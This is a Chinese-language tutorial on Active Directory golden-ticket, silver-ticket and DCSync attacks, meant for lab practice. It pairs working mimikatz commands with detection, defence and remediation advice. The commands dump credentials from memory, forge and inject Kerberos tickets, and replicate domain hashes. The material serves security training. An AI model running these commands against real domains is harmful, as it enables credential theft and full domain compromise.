域渗透:黄金票据、白银票据与 DC 同步

在本地 AD 靶场理解并验证黄金票据、白银票据与 DC 同步(DCSync)的原理、影响、利用、检测、防御与修复。

写在前面:合法学习边界

票据伪造与 DC 同步只能在自建 AD 靶场进行。在真实域环境伪造票据、提取 krbtgt 哈希、同步域控凭据可能触犯法律。

一、漏洞原理

Kerberos 认证中,票据的可信性由密钥保证:

1
2
3
TGT(黄金票据):用 krbtgt 账号的哈希签发,可伪造任意用户
服务票据(白银票据):用服务账号哈希签发,可伪造对某服务的访问
DCSync:拥有复制权限的账号可远程同步域控凭据哈希

核心:

1
2
3
黄金票据 = 拿到 krbtgt 哈希 → 伪造任意用户 TGT
白银票据 = 拿到服务账号哈希 → 伪造服务票据(不经过 KDC)
DCSync = 有 Replicating 权限 → 直接同步域管哈希

二、影响与危害

域渗透攻击路径图
1
2
3
黄金票据:持久存在、域内任意访问,改密码也不一定失效(krbtgt 需两次)
白银票据:无需 KDC,隐蔽,直打指定服务
DCSync:直接拿到域管/其他账号哈希,一击致命

风险等级:严重,基本等于域失守。

三、利用 / 复现

第一步:拿到权限与哈希

在已控制的域内机器上,用 mimikatz 抓取凭据:

1
2
3
privilege::debug
sekurlsa::logonpasswords
# 解释:privilege::debug 提调试权限;logonpasswords 抓内存中的哈希/明文

要伪造黄金票据,需要 krbtgt 的哈希 + 域的 SID。

第二步:生成黄金票据

1
2
3
kerberos::golden /user:administrator /domain:corp.local \
  /sid:S-1-5-21-xxx /krbtgt:<krbtgt哈希> /ptt
# 解释:用 krbtgt 哈希伪造管理员 TGT,/ptt 直接注入当前会话

/ptt 直接把票据注入当前会话,即可访问域内任意资源。

第三步:白银票据

1
2
3
kerberos::golden /user:administrator /domain:corp.local \
  /sid:S-1-5-21-xxx /target:dc.corp.local /service:cifs \
  /rc4:<服务账号哈希> /ptt

第四步:DC 同步(DCSync)

用具备复制权限的账号:

1
2
3
lsadump::dcsync /domain:corp.local /user:krbtgt
lsadump::dcsync /domain:corp.local /all
# 解释:DCSync 通过复制协议远程拉取目标账号哈希,无需登录目标机器

即可远程拿到目标账号哈希,进而制作黄金票据或直接登录。

四、检测

1
2
3
4
异常 TGT:不存在的用户、无 KDC 请求的票据使用
4624/4629 登录事件中票据信息异常
大量 DCSync 特征的复制请求(事件 4662)
黄金票据:krbtgt 哈希被异常使用(改密两次后才失效)

五、防御

1
2
3
4
限制具有复制权限的账号,最小化 DCSync 面
特权账号监控 + 不在普通机器登录
启用 Kerberos 与复制相关审计(4662、4769 等)
实现 RODC / 增强密钥策略

六、修复

1
2
3
4
怀疑黄金票据:连续两次重置 krbtgt 密码(让旧票据失效)
清理被植入的票据与后门
下线/重置被泄露的特权账号
全局排查并复测:旧票据不再可用

七、小结

黄金/白银票据与 DCSync 的共同点是“拿到密钥/权限就能绕过正常认证”。域渗透到最后往往就落在这几招上;防守核心是保护 krbtgt、限制复制权限、监控票据与复制事件。